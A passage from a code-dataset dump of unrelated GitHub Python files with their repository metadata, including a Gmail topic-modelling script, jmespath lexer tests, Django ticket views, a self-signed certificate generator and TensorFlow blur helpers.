\"\"\"\n Make sure all threads reach sync() before continuing.\n Block until all threads have reached this point.\n \"\"\"\n def sync(self):\n self.mutex.acquire()\n self.count += 1\n self.mutex.release()\n if (self.count < self.togo):\n self.sem.acquire()\n self.sem.release()\n\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Gmail Topic Modeling'\nDICTIONARY_FILE = 'gmail.dict'\nCORPUS_FILE = 'gmailCorpus.mm'\nMODEL_FILE = 'LDAmodel'\nNUM_WORKERS = int(newFlags.nWorkers)\nPREEXISTING = bool(newFlags.preExisting)\nQUERY = 'label:inbox'\n# Barrier for NUM_WORKERS threads + 1 main thread\nbarrier = Barrier(NUM_WORKERS + 1)\n\ndef getCredentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'gmail-python-quickstart.json')\n\n store = oauth2client.file.Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\n\"\"\"\n Worker thread that appends to the final list parameter\n final[0] = texts\n final[1] = corpus\n Input is a start and end index into the messages list\n\"\"\"\ndef dataWorker(start, end, final, messages):\n documents = []\n credentials = getCredentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n query = QUERY\n\n for i in range(start, end):\n msg_id = messages[i]['id']\n message = service.users().messages().get(userId='me', id=msg_id, format='full').execute()\n\n if 'multipart' in str(message['payload']['mimeType']):\n parts = message['payload']['parts']\n else:\n parts = [message['payload']]\n #pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(message)\n\n for content in parts:\n if content['mimeType'] == 'text/plain':\n try:\n fullMessage = base64.urlsafe_b64decode(str(content['body']['data']))\n fullMessage = fullMessage.decode('unicode-escape', 'ignore')\n documents.append(fullMessage)\n #print(base64.urlsafe_b64decode(str(content['body']['data'])))\n except KeyError:\n continue\n\n print(\"Removing stopwords...\")\n stoplist = set((\"for a an this under through are them with you got we that be as our\" +\n \"have your of what is his her on at and or to in not aren't when \\r \\n\").split())\n texts = [[word for word in document.lower().split() if word not in stoplist]\n for document in documents] \n startlist = tuple('> http - ~ = the [ 1 2 3 4 5 6 7 8 9 0 from www ..'.split())\n texts = [[word for word in text if not word.startswith(startlist)] for text in texts]\n\n # Remove words that appear only once\n print(\"Removing words that appear only once...\")\n frequency = defaultdict(int)\n for text in texts:\n for token in text:\n frequency[token] += 1\n texts = [[token for token in text if frequency[token] > 1]\n for text in texts] \n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n final.append(texts)\n final.append(corpus)\n barrier.sync()\n\n\"\"\"\n Reads the list of messages that match the given query from the Gmail API\n Spawns NUM_WORKERS threads that operate on partitions of the messages list.\n\"\"\"\ndef prepareData():\n credentials = getCredentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n query = QUERY\n\n response = service.users().messages().list(userId='me', q=query).execute()\n\n messages = []\n if 'messages' in response:\n messages.extend(response['messages']) \n\n while 'nextPageToken' in response:\n page_token = response['nextPageToken']\n response = service.users().messages().list(userId='me', q=query,\n pageToken=page_token).execute()\n messages.extend(response['messages'])\n\n #print(\"len(messages) = %d\" % (len(messages)))\n textsSub = [[] for x in range(0, NUM_WORKERS)]\n\n start = time.time()\n for i in range(0, NUM_WORKERS):\n #Partition the messages list to each thread\n low = (i * len(messages) / NUM_WORKERS)\n if (i == NUM_WORKERS - 1):\n high = len(messages)\n else:\n high = ((i + 1) * len(messages)/NUM_WORKERS)\n \n thread = threading.Thread(target=dataWorker, args=(low, high, textsSub[i], messages))\n thread.start()\n\n # Use a barrier for synchronization to make sure all threads have finished\n barrier.sync()\n # Merge all the texts and corpuses generated from each thread into one large texts and corpus list\n texts = [x for text in textsSub for x in text[0]]\n corpus = [x for corp in textsSub for x in corp[1]]\n #pprint.pprint(textsSub)\n\n print(\"Serializing dictionary...\")\n dictionary = corpora.Dictionary(texts)\n dictionary.save(DICTIONARY_FILE)\n\n print(\"Serializing corpus...\")\n corpora.MmCorpus.serialize(CORPUS_FILE, corpus)\n print(\"Total took %d seconds\" % (time.time() - start))\n \n #pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(message)\n\ndef main():\n cwd = os.path.expanduser('.')\n dict_dir = os.path.join(cwd, DICTIONARY_FILE)\n corpus_dir = os.path.join(cwd, CORPUS_FILE)\n if not os.path.exists(dict_dir) or not os.path.exists(corpus_dir) or not PREEXISTING:\n if PREEXISTING:\n print(\"Selected 'use preExisting model', but doesn't exist\")\n else:\n print(\"Selected 'do not use preExisting model'\")\n # Only generate texts and corpus if needed or prompted by user.\n prepareData()\n \n print(\"Loading dictionary...\")\n id2word = corpora.Dictionary.load(DICTIONARY_FILE)\n print(\"Loading corpus...\")\n corpus = corpora.MmCorpus(CORPUS_FILE)\n\n print(\"Running LDA...\")\n lda = models.ldamodel.LdaModel(corpus=corpus, id2word=id2word,\n num_topics=100, update_every=1,\n chunksize=10000, passes=1)\n print(lda.print_topics(20))\n print(\"Saving model...\")\n lda.save(MODEL_FILE)\n \nif __name__ == '__main__':\n main()\n","repo_name":"darshanthaker/GLDA","sub_path":"GLDA.py","file_name":"GLDA.py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21391387039","text":"\"\"\"Test html small tag.\n\npoetry run pytest tests/test_html/test_tag_small.py\n\"\"\"\nimport pytest\n\nfrom src.djlint.reformat import formatter\nfrom tests.conftest import printer\n\ntest_data = [\n pytest.param(\n \"text\",\n \"text\\n\",\n id=\"small_tag\",\n ),\n]\n\n\n@pytest.mark.parametrize((\"source\", \"expected\"), test_data)\ndef test_base(source, expected, basic_config):\n output = formatter(basic_config, source)\n\n printer(expected, source, output)\n assert expected == output\n","repo_name":"Riverside-Healthcare/djLint","sub_path":"tests/test_html/test_tag_small.py","file_name":"test_tag_small.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"53"} +{"seq_id":"8236867463","text":"from socket import gethostname\n\nfrom OpenSSL import crypto\n\nCERT_FILE = \"xserver/coreserver/server.cert\"\nKEY_FILE = \"xserver/coreserver/server.key\"\n\n\ndef create_self_signed_cert():\n k = crypto.PKey()\n k.generate_key(crypto.TYPE_RSA, 1024)\n cert = crypto.X509()\n cert.get_subject().C = \"PL\"\n cert.get_subject().ST = \"Lublin\"\n cert.get_subject().L = \"Lublin\"\n cert.get_subject().O = \"c\"\n cert.get_subject().OU = \"c\"\n cert.get_subject().CN = 'localhost'\n print(gethostname())\n cert.set_serial_number(1000)\n cert.gmtime_adj_notBefore(0)\n cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60)\n cert.set_issuer(cert.get_subject())\n cert.set_pubkey(k)\n cert.sign(k, 'sha1')\n\n open(CERT_FILE, \"wt\").write(\n crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode())\n open(KEY_FILE, \"wt\").write(\n crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode())\n\n\ncreate_self_signed_cert()\n","repo_name":"RaVkloc/IRC_Chat","sub_path":"cert_creator.py","file_name":"cert_creator.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6260301199","text":"PARSER_INPUT_EXCHANGE_NAME = 'parsers'\nPARSER_OUTPUT_EXCHANGE_NAME = 'parser_results'\nUSER_ID = 'userId'\nDATETIME = 'datetime'\nRABBIT_DEFAULT_URL = 'rabbitmq://127.0.0.1:5672'\nMONGODB_DEFAULT_URL = 'mongodb://brain:brain@127.0.0.1:27017'\nSERVER_DEFAULT_HOST = '127.0.0.1'\nSERVER_DEFAULT_PORT = '8000'\nDB_NAME = 'brain_data'\nDB_SNAPSHOT_COLLECTION = 'snapshots'\nDN_USER_COLLECTION = 'users'\nDATA = 'data'\nFIELD = 'field'\nHEADER = 'header'\nUSER_TOPIC = 'user'\nAPI_RESOURCES_MODULE_PATH = 'api_resources'\nURL_FIELD = 'url'\nLOCALHOST = '127.0.0.1'\nDEFAULT_API_PORT = 5000\nDEFAULT_UI_PORT = 8080\nTIMESTAMP = 'timestamp'\nPOSE = 'pose'\nCOLOR_IMAGE = 'colorImage'\nDEPTH_IMAGE = 'depthImage'\nFEELINGS = 'feelings'\nSUPPORTED_FIELDS = 'supported_fields'\nSAVE_PATH = \"/brain_data/snapshot_data\"\nDUMP_FIELDS = ['colorImage', 'depthImage']\n\n","repo_name":"baraschner/brain","sub_path":"brain/utils/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23839760441","text":"'''\nProblem 4\nLargest palindrome product\n\nA palindromic number reads the same both ways. The largest palindrome\nmade from the product of two 2-digit numbers is 9009 = 91 × 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n'''\n\nimport math\nimport sys\n\npalindromes = []\ndef isPalindrome(number):\n\tn = number\n\treverse = 0\n\twhile(n > 0):\n\t\treverse = reverse * 10 + n % 10\n\t\tn = math.floor(n / 10)\n\treturn number == reverse\n\ndef EulerProblem0004():\n\tfor i in range(100, 1000, 1):\n\t\tfor j in range(100, 1000, 1):\n\t\t\tif isPalindrome(i * j):\n\t\t\t\tpalindromes.append(i * j)\n\n\tmaxPalindrome = max(palindromes)\n\n\tprint(maxPalindrome)\nif __name__ == \"__main__\":\n\tEulerProblem0004()\n\t\n","repo_name":"zhaphod/ProjectEuler","sub_path":"Python/proj_euler_problem_0004.py","file_name":"proj_euler_problem_0004.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14934908182","text":"from tkinter import StringVar, Misc\nfrom tkinter.ttk import OptionMenu\n\nfrom src.variable_handler import VariableHandler\n\n\nclass GenerationMenu(OptionMenu):\n \"\"\"A ttk option-menu with options for generations where the EV mechanics differ.\"\"\"\n def __init__(self, master: Misc, variable_handler: VariableHandler):\n self.generations = [\n 'Gen I-VI',\n 'Gen VII+'\n ]\n\n self._value = StringVar(master, self.generations[0])\n self._value.trace_add('write', lambda *_: variable_handler.set_value('generation', self.get_generation()))\n variable_handler.add_tracker(\n 'generation', lambda: self._value.set(self.generations[variable_handler.get_value('generation')])\n )\n super().__init__(master, self._value, self._value.get(), *self.generations)\n\n def get_generation(self) -> int:\n \"\"\"Returns the list index for the value of the option button.\"\"\"\n return self.generations.index(self._value.get())\n","repo_name":"MrNinjaPowha/ev-counter","sub_path":"src/components/blocks/generation_menu.py","file_name":"generation_menu.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25048374853","text":"def merge_sort(array):\n length = len(array)\n\n if length == 1:\n return array\n\n mid = length // 2\n\n left = merge_sort(array[:mid])\n right = merge_sort(array[mid:])\n\n return merge(left, right)\n\n\ndef merge(left, right):\n output = []\n i = j = 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n output.append(left[i])\n i += 1\n else:\n output.append(right[j])\n j += 1\n\n output.extend(left[i:])\n output.extend(right[j:])\n\n return output","repo_name":"hadr0x/algorithms","sub_path":"sorting/merge-sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11988860528","text":"class Input:\n tmp = []\n\n def read_data(self):\n text = ''\n while text != 'done':\n text = input(\"> \")\n if not text != 'done':\n continue\n self.tmp.append(text)\n\n def to_string_list(self):\n print(self.tmp)\n\n def to_int_list(self):\n try:\n tmp = list(map(int, self.tmp))\n print(tmp)\n return tmp\n except ValueError:\n print(\"No es una list de int\")\n\n def revert(self):\n pass\n\n def calculate(self):\n pass\n\n\nclass ReverseText(Input):\n\n def __init__(self):\n super(ReverseText, self).__init__()\n\n def revert(self):\n print(self.tmp[::-1])\n\n\nclass CalculateNumbers(Input):\n\n def __init__(self):\n super(CalculateNumbers, self).__init__()\n\n def calculate(self):\n dif = {}\n nums = self.to_int_list()\n if nums is not None:\n for i, num in enumerate(nums):\n n = 50 - num\n if n not in dif:\n dif[num] = i\n else:\n print([dif[n], i])\n else:\n print(\"La list no es valid\")\n\n\ninput_1 = ReverseText()\ninput_1.read_data()\n\"input_1.to_int_list()\"\ninput_1.to_string_list()\ninput_1.revert()\n\n\"input_1 = CalculateNumbers()\"\n\"input_1.read_data()\"\n\"input_1.to_int_list()\"\n\"input_1.calculate()\"\n","repo_name":"jesusmares82-hub/contador_de_palabras_python","sub_path":"Ejemplos/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23522770944","text":"from ..utils import rest\nfrom ..utils.resource import Resource\n\n\nclass BrcodePreview(Resource):\n\n \"\"\"# BrcodePreview object\n DEPRECATED: USE PaymentPreview INSTEAD\n A BrcodePreview is used to get information from a BR Code you received to check the informations before paying it.\n ## Attributes (return-only):\n - status [string]: Payment status. ex: \"active\", \"paid\", \"canceled\" or \"unknown\"\n - name [string]: Payment receiver name. ex: \"Tony Stark\"\n - tax_id [string]: Payment receiver tax ID. ex: \"012.345.678-90\"\n - bank_code [string]: Payment receiver bank code. ex: \"20018183\"\n - branch_code [string]: Payment receiver branch code. ex: \"0001\"\n - account_number [string]: Payment receiver account number. ex: \"1234567\"\n - account_type [string]: Payment receiver account type. ex: \"checking\"\n - allow_change [bool]: If True, the payment is able to receive amounts that are different from the nominal one. ex: True or False\n - amount [integer]: Value in cents that this payment is expecting to receive. If 0, any value is accepted. ex: 123 (= R$1,23)\n - reconciliation_id [string]: Reconciliation ID linked to this payment. ex: \"txId\", \"payment-123\"\n \"\"\"\n\n def __init__(self, status, name, tax_id, bank_code, branch_code, account_number, account_type, allow_change, amount, reconciliation_id):\n self.status = status\n self.name = name\n self.tax_id = tax_id\n self.bank_code = bank_code\n self.branch_code = branch_code\n self.account_number = account_number\n self.account_type = account_type\n self.allow_change = allow_change\n self.amount = amount\n self.reconciliation_id = reconciliation_id\n\n\n_resource = {\"class\": BrcodePreview, \"name\": \"BrcodePreview\"}\n\n\ndef query(brcodes, user=None):\n \"\"\"# Retrieve BrcodePreviews\n Process BR Codes before creating BrcodePayments\n ## Parameters (optional):\n - brcodes [list of strings]: List of brcodes to preview. ex: [\"00020126580014br.gov.bcb.pix0136a629532e-7693-4846-852d-1bbff817b5a8520400005303986540510.005802BR5908T'Challa6009Sao Paulo62090505123456304B14A\"]\n - user [Organization/Project object, default None]: Organization or Project object. Not necessary if starkbank.user was set before function call\n ## Return:\n - generator of BrcodePreview objects with updated attributes\n \"\"\"\n return rest.get_stream(\n resource=_resource,\n brcodes=brcodes,\n limit=None,\n user=user,\n )\n","repo_name":"isaccanedo/sdk-python","sub_path":"starkbank/brcodepreview/__brcodepreview.py","file_name":"__brcodepreview.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13685903623","text":"from tests import unittest\n\nfrom jmespath import lexer\nfrom jmespath.exceptions import LexerError, EmptyExpressionError\n\n\nclass TestRegexLexer(unittest.TestCase):\n\n def setUp(self):\n self.lexer = lexer.Lexer()\n\n def assert_tokens(self, actual, expected):\n # The expected tokens only need to specify the\n # type and value. The line/column numbers are not\n # checked, and we use assertEqual for the tests\n # that check those line numbers.\n stripped = []\n for item in actual:\n stripped.append({'type': item['type'], 'value': item['value']})\n # Every tokenization should end in eof, so we automatically\n # check that value, strip it off the end, and then\n # verify the remaining tokens against the expected.\n # That way the tests don't need to add eof to every\n # assert_tokens call.\n self.assertEqual(stripped[-1]['type'], 'eof')\n stripped.pop()\n self.assertEqual(stripped, expected)\n\n def test_empty_string(self):\n with self.assertRaises(EmptyExpressionError):\n list(self.lexer.tokenize(''))\n\n def test_field(self):\n tokens = list(self.lexer.tokenize('foo'))\n self.assert_tokens(tokens, [{'type': 'unquoted_identifier',\n 'value': 'foo'}])\n\n def test_number(self):\n tokens = list(self.lexer.tokenize('24'))\n self.assert_tokens(tokens, [{'type': 'number',\n 'value': 24}])\n\n def test_negative_number(self):\n tokens = list(self.lexer.tokenize('-24'))\n self.assert_tokens(tokens, [{'type': 'number',\n 'value': -24}])\n\n def test_quoted_identifier(self):\n tokens = list(self.lexer.tokenize('\"foobar\"'))\n self.assert_tokens(tokens, [{'type': 'quoted_identifier',\n 'value': \"foobar\"}])\n\n def test_json_escaped_value(self):\n tokens = list(self.lexer.tokenize('\"\\u2713\"'))\n self.assert_tokens(tokens, [{'type': 'quoted_identifier',\n 'value': u\"\\u2713\"}])\n\n def test_number_expressions(self):\n tokens = list(self.lexer.tokenize('foo.bar.baz'))\n self.assert_tokens(tokens, [\n {'type': 'unquoted_identifier', 'value': 'foo'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'bar'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'baz'},\n ])\n\n def test_space_separated(self):\n tokens = list(self.lexer.tokenize('foo.bar[*].baz | a || b'))\n self.assert_tokens(tokens, [\n {'type': 'unquoted_identifier', 'value': 'foo'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'bar'},\n {'type': 'lbracket', 'value': '['},\n {'type': 'star', 'value': '*'},\n {'type': 'rbracket', 'value': ']'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'baz'},\n {'type': 'pipe', 'value': '|'},\n {'type': 'unquoted_identifier', 'value': 'a'},\n {'type': 'or', 'value': '||'},\n {'type': 'unquoted_identifier', 'value': 'b'},\n ])\n\n def test_literal(self):\n tokens = list(self.lexer.tokenize('`[0, 1]`'))\n self.assert_tokens(tokens, [\n {'type': 'literal', 'value': [0, 1]},\n ])\n\n def test_literal_string(self):\n tokens = list(self.lexer.tokenize('`foobar`'))\n self.assert_tokens(tokens, [\n {'type': 'literal', 'value': \"foobar\"},\n ])\n\n def test_literal_number(self):\n tokens = list(self.lexer.tokenize('`2`'))\n self.assert_tokens(tokens, [\n {'type': 'literal', 'value': 2},\n ])\n\n def test_literal_with_invalid_json(self):\n with self.assertRaises(LexerError):\n list(self.lexer.tokenize('`foo\"bar`'))\n\n def test_literal_with_empty_string(self):\n tokens = list(self.lexer.tokenize('``'))\n self.assert_tokens(tokens, [{'type': 'literal', 'value': ''}])\n\n def test_position_information(self):\n tokens = list(self.lexer.tokenize('foo'))\n self.assertEqual(\n tokens,\n [{'type': 'unquoted_identifier', 'value': 'foo',\n 'start': 0, 'end': 3},\n {'type': 'eof', 'value': '', 'start': 3, 'end': 3}]\n )\n\n def test_position_multiple_tokens(self):\n tokens = list(self.lexer.tokenize('foo.bar'))\n self.assertEqual(\n tokens,\n [{'type': 'unquoted_identifier', 'value': 'foo',\n 'start': 0, 'end': 3},\n {'type': 'dot', 'value': '.',\n 'start': 3, 'end': 4},\n {'type': 'unquoted_identifier', 'value': 'bar',\n 'start': 4, 'end': 7},\n {'type': 'eof', 'value': '',\n 'start': 7, 'end': 7},\n ]\n )\n\n def test_adds_quotes_when_invalid_json(self):\n tokens = list(self.lexer.tokenize('`{{}`'))\n self.assertEqual(\n tokens,\n [{'type': 'literal', 'value': '{{}',\n 'start': 0, 'end': 4},\n {'type': 'eof', 'value': '',\n 'start': 5, 'end': 5}\n ]\n )\n\n def test_unknown_character(self):\n with self.assertRaises(LexerError) as e:\n tokens = list(self.lexer.tokenize('foo[0^]'))\n\n def test_bad_first_character(self):\n with self.assertRaises(LexerError):\n tokens = list(self.lexer.tokenize('^foo[0]'))\n\n def test_unknown_character_with_identifier(self):\n with self.assertRaisesRegex(LexerError, \"Unknown token\"):\n list(self.lexer.tokenize('foo-bar'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jmespath/jmespath.py","sub_path":"tests/test_lexer.py","file_name":"test_lexer.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":1970,"dataset":"github-code","pt":"53"} +{"seq_id":"40531581658","text":"\"\"\"\nLa routine diag_pol_diff_bhmie.py compare la fonction de phase \nsortie de la subroutine bhmie et un type d'enveloppe dans un \ndiagramme polaire.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nenv='rayl' #Type d'enveloppe\n\ndata1=open('Data/bhmie_diff.dat','r')\nif (env=='rayl'):\n data2=open('Data/rayl_diff.dat','r')\nelif (env=='hg'):\n data2=open('Data/hg_diff.dat','r')\nelif (env=='polyn'):\n data2=open('Data/polyn_diff.dat','r')\ntab1=np.array([s.strip().split() for s in data1],dtype='f')\ntab2=np.array([s.strip().split() for s in data2],dtype='f')\ndata_list=(tab1,tab2)\n\ndef diag_pol(data_list):\n fig, ax= plt.subplots(figsize=(6.5,9))\n for i in range(0,len(data_list)):\n tab=data_list[i]\n\n diag_pol=np.zeros((tab.shape[0],2))\n diag_pol[:,0]=-tab[:,1]*np.cos(tab[:,2])\n diag_pol[:,1]=tab[:,1]*np.sin(tab[:,2])\n\n ax.plot(diag_pol[:,0],diag_pol[:,1],color=color[i])\n ax.plot(diag_pol[:,0],-diag_pol[:,1],linestyle='--',color=color[i])\n\n ax.set_xlabel(r'$P_{esc}cos(\\theta)$')\n ax.set_ylabel(r'$P_{esc}sin(\\theta)$')\n ax.set_ylim([-1,1])\n ax.set_xlim([-1,1])\n ax.grid()\n \n plt.legend()\n plt.show()\ndiag_pol(data_list)\n","repo_name":"PaulBarrere/diffusion-project","sub_path":"Python/diag_pol_diff_bhmie.py","file_name":"diag_pol_diff_bhmie.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22926623801","text":"from django.shortcuts import render, redirect, reverse\nfrom .models import Ticket, TicketProgress\nfrom cart.models import Order\nfrom .forms import TicketForm\nfrom app1.models import Answer\nfrom app1.forms import AnswerForm\nfrom accounts.models import UserProfile\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth , messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator\n\n# sends the user profile model to feature list page\n# assigns the ticket objects to a instance of ticket to be able to use the pagination\n# uses the Ticket Form to add a Ticket\n@login_required\ndef ticketlist(request):\n order = Order.objects.filter(user=request.user).first()\n profile = UserProfile.objects.all()\n ticket_obj = Ticket.objects.order_by('-date_posted')\n paginator = Paginator(ticket_obj, 3)\n page = request.GET.get('page')\n ticket = paginator.get_page(page)\n form = TicketForm(request.POST)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.author = request.user\n instance.save()\n form = TicketForm()\n return render(request, 'feature/ticketlist.html', {'ticket':ticket, 'form':form, 'profile':profile, 'order':order})\n# displays feature details informations and if the ticket has been answered\n# sends the profile model information to ticket detail page\n@login_required\ndef ticketdetail(request, ticket_id):\n answer = 'There is no answer yet'\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n try:\n profile = get_object_or_404(UserProfile, user=ticket.author)\n except ObjectDoesNotExist:\n pass\n try:\n ticketprogress = TicketProgress.objects.get(ticket_prog=ticket_id)\n if ticketprogress.progress == 100:\n ticket.done = True\n ticket.save()\n else:\n ticket.done = False\n\n except ObjectDoesNotExist:\n ticketprogress = 0\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n try:\n answer = Answer.objects.get(name=ticket.name)\n except ObjectDoesNotExist:\n pass\n return render(request, 'feature/ticketdetail.html', dict(ticket=ticket, ticketprogress=ticketprogress, answer=answer, profile=profile))\n\n\n@login_required\ndef ticketdelete(request, ticket_id):\n form = Ticket.objects.filter(pk=ticket_id)\n if request.method == 'POST':\n form.delete()\n return redirect(reverse('feature:ticketlist'))\n\n# updates the ticket\n@login_required\ndef ticketupdate(request, ticket_id):\n\n ticket = Ticket.objects.get(pk=ticket_id)\n if request.POST:\n form = TicketForm(request.POST)\n\n if form.is_valid():\n ticket = Ticket.objects.get(pk=ticket_id)\n form = TicketForm(request.POST, instance = ticket)\n form.save()\n return redirect(reverse('feature:ticketlist')) \n else: \n u_form = {\"name\": ticket.name, \"content\":ticket.content} \n form = TicketForm(initial=u_form)\n \n return render(request, 'feature/ticketupdate.html',{'form':form})\n# Validates the voting system \n# Takes voting users and saves as string in \"voted\" comparing with the request.user when voting\n@login_required\ndef ticketresult(request, ticket_id):\n mylist = ''\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n if request.method == 'POST':\n User.objects.filter(username=request.user)\n value = int(request.POST['value']) \n ticket.votes += value\n\n if request.user.username in ticket.voted:\n messages.warning(request, \"You already voted for this post!\")\n return redirect(reverse('feature:ticketlist'))\n\n elif not request.user.username in ticket.voted: \n mylist = ' ' + str(request.user.username) + ' ' \n savedVoted = ticket.voted\n ticket.voted = mylist + savedVoted\n ticket.save()\n return redirect(reverse('feature:ticketdetail', args=(ticket.id,)))\n# uses the Answer form to post an answer to post \ndef ticketanswer(request, ticket_id):\n answer = []\n form = AnswerForm(request.POST)\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n try:\n answer = Answer.objects.get(name=ticket.name)\n except ObjectDoesNotExist:\n form = AnswerForm(request.POST)\n if request.method == 'POST':\n answer = Answer.objects.create(name=ticket.name, content=request.POST['content'])\n return redirect(reverse('feature:ticketlist'))\n return render(request, 'feature/ticketanswer.html', {'form':form, 'answer':answer, 'ticket':ticket})\n#if a ticket is done redirects to a page with ticket notes\ndef ticketdone(request, ticket_id):\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n \n return render(request, 'feature/ticketdone.html', {'ticket': ticket})","repo_name":"flo0909/djangoprj1","sub_path":"feature/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34045666172","text":"import tensorflow as tf\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\nfrom ops import concat\n\n\ndef gauss_kernel_fixed(sigma, N):\n # Non-Adaptive kernel size\n if sigma == 0:\n return np.eye(2 * N + 1)[N]\n x = np.arange(-N, N + 1, 1.0)\n g = np.exp(-x * x / (2 * sigma * sigma))\n g = g / np.sum(np.abs(g))\n return g\n\n\ndef gaussian_blur(image, kernel, kernel_size, cdim=3):\n # kernel as placeholder variable, so it can change\n outputs = []\n pad_w = (kernel_size - 1) // 2\n padded = tf.pad(image, [[0, 0], [pad_w, pad_w], [pad_w, pad_w], [0, 0]], mode='REFLECT')\n for channel_idx in range(cdim):\n data_c = padded[:, :, :, channel_idx:(channel_idx + 1)]\n g = tf.reshape(kernel, [1, kernel_size, 1, 1])\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n g = tf.reshape(kernel, [kernel_size, 1, 1, 1])\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n outputs.append(data_c)\n return concat(outputs, axis=3)\n\n\ndef gauss_kernel(sigma, eps, truncate):\n # Adaptive kernel size based on sigma,\n # for fixed kernel size, hardcode N\n # truncate limits kernel size as in scipy's gaussian_filter\n\n N = np.clip(np.ceil(sigma * np.sqrt(2 * np.log(1 / eps))), 1, truncate)\n x = np.arange(-N, N + 1, 1.0)\n g = np.exp(-x * x / (2 * sigma * sigma))\n g = g / np.sum(np.abs(g))\n return g\n\n\ndef gaussian_blur_adaptive(image, sigma, eps=0.01, img_width=32, cdim=3):\n if sigma == 0:\n return image\n outputs = []\n kernel = gauss_kernel(sigma, eps, img_width - 1)\n pad_w = (kernel.shape[0] - 1) // 2\n padded = tf.pad(image, [[0, 0], [pad_w, pad_w], [pad_w, pad_w], [0, 0]], mode='REFLECT')\n for channel_idx in range(cdim):\n data_c = padded[:, :, :, channel_idx:(channel_idx + 1)]\n g = np.expand_dims(kernel, 0)\n g = np.expand_dims(g, axis=2)\n g = np.expand_dims(g, axis=3)\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n g = np.expand_dims(kernel, 1)\n g = np.expand_dims(g, axis=2)\n g = np.expand_dims(g, axis=3)\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n outputs.append(data_c)\n return concat(outputs, axis=3)\n\n\n# --- old functions, not used any more --\n\ndef _gkern(sigma, truncate=2, dim=1):\n \"\"\"Returns a 1D or 2D Gaussian kernel array.\"\"\"\n size = truncate * 2 + 1\n if dim == 1:\n delta = np.eye(size)[truncate]\n if dim == 2:\n # create nxn zeros\n delta = np.zeros((size, size))\n # set element at the middle to one, a kronecker delta\n delta[truncate, truncate] = 1\n # gaussian-smooth the dirac, resulting in a gaussian filter mask\n return gaussian_filter(delta, sigma, 